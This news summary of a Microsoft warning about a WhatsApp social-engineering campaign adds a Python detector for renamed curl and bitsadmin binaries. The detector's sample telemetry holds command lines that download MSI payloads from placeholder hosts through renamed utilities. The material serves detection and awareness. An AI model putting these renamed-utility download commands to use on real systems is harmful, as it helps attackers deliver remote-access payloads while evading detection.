Don't open that WhatsApp message, Microsoft warns

Microsoft has issued a warning regarding a sophisticated social engineering campaign on WhatsApp that uses malicious scripts and legitimate Windows tools to gain unauthorized remote access to computers.

Key Points

  • Attackers distribute malicious Visual Basic Script files via WhatsApp, often appearing to originate from a victim's existing contacts.
  • The malware uses "living off the land" techniques, renaming legitimate Windows utilities such as curl.exe and bitsadmin.exe so that their activity evades detection.
  • Secondary payloads are downloaded from trusted cloud services, including AWS, Tencent Cloud, and Backblaze B2, to blend in with normal network traffic.
  • The final stage is a Microsoft Installer (MSI) package, such as AnyDesk.msi, that gives attackers full remote control of the machine to steal data or deploy ransomware.
  • Microsoft recommends that users and organizations prioritize employee training to recognize suspicious attachments and unexpected messages on messaging platforms.
  • WhatsApp users can enable "Strict Account Settings" in the app's privacy menu to automatically block attachments and calls from unknown users.
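
The renamed-utility technique in the second point can be caught from process-creation telemetry that records the executable's embedded OriginalFileName next to its on-disk path (Sysmon Event ID 1 carries both). The following is an added example, not code from the article or from Microsoft's report; the event records are constructed and the field names mirror Sysmon's.

```python
import ntpath
from dataclasses import dataclass
from typing import List

# Windows utilities the campaign is reported to rename before use. Matching on
# the PE version resource's OriginalFileName means whatever name the attacker
# gives the copy on disk does not affect the check.
WATCHED_ORIGINALS = {"curl.exe", "bitsadmin.exe"}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str               # full path of the executable that ran
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str


def is_renamed_lolbin(ev: ProcessEvent) -> bool:
    """True when a watched utility ran under a name other than its own."""
    on_disk = ntpath.basename(ev.image).lower()
    original = ev.original_file_name.lower()
    return original in WATCHED_ORIGINALS and on_disk != original


def find_renamed_lolbins(events: List[ProcessEvent]) -> List[ProcessEvent]:
    """Return only the events where a watched utility was renamed."""
    return [ev for ev in events if is_renamed_lolbin(ev)]


# Constructed sample telemetry: two legitimate runs, two renamed copies.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl.exe",
                 "curl.exe https://example.invalid/version.txt"),
    ProcessEvent(r"C:\Users\user\AppData\Local\Temp\svc.exe", "curl.exe",
                 "svc.exe -o stage2.msi https://bucket.example.invalid/s2"),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe", "bitsadmin.exe",
                 "bitsadmin /list"),
    ProcessEvent(r"C:\Users\Public\win.exe", "bitsadmin.exe",
                 "win.exe /transfer job https://cdn.example.invalid/a.msi a.msi"),
]

if __name__ == "__main__":
    for ev in find_renamed_lolbins(SAMPLE_EVENTS):
        print(f"renamed {ev.original_file_name} running as {ev.image}")
```

The same comparison works for any utility whose version resource names it, so the watch set can grow without changing the logic.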

Why it Matters

This campaign highlights the growing risk of attackers abusing trusted communication platforms, and the legitimate software already present on a machine, to slip past traditional security controls. Businesses and individuals must remain vigilant, as these attacks can lead to total system compromise, data theft, and the deployment of further ransomware threats.

Theregister.com, published by Jessica Lyons